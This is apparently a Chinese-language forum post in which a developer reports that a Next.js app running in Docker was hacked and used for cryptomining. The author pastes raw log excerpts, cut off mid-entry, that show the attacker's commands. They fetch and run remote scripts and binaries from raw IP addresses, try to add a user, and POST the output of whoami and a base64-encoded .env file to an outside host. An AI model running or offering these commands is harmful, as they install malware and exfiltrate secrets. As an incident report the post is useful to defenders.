不是单单next.js,用了next.js都有风险
前两天机器一直满负载,不知道为啥,就简单删了pid,今天看到一个应用不能用了,去看了log才知道被黑了,把应用的docer停了

原来前两天是植入了挖矿的代码

简单放几段被黑的命令

Connecting to 216.158.232.43:12000 (216.158.232.43:12000)wget: can't open 'sex.sh': Permission denied ⨯ [Error: Command failed: wget http://216.158.232.43:12000/sex.sh && bash sex.sh/bin/sh: useradd: not foundchpasswd: permission denied (are you root?)/bin/sh: curl: not found ⨯ [Error: Command failed: curl -s -H "host:www.google.com" http://47.90.227.150/google_verify.php -X POST --data "domain=104.194.67.126:3002%20`whoami`%20`cat .env|base64 -w 0`"cat: can't open '.env': No such file or directoryerror: [Error: spawnSync /bin/sh ETIMEDOUT] {    errno: -110,    code: 'ETIMEDOUT',    syscall: 'spawnSync /bin/sh',    path: '/bin/sh',    spawnargs: [      '-c',      '(cd /dev;busybox wget http://89.144.31.18/nuts/x86;chmod 777 x86;./x86 reactOnMynuts;busybox wget -q http://89.144.31.18/nuts/bolts -O-|sh)'    ],    error: [Error: spawnSync /bin/sh ETIMEDOUT] {      errno: -110,      code: 'ETIMEDOUT',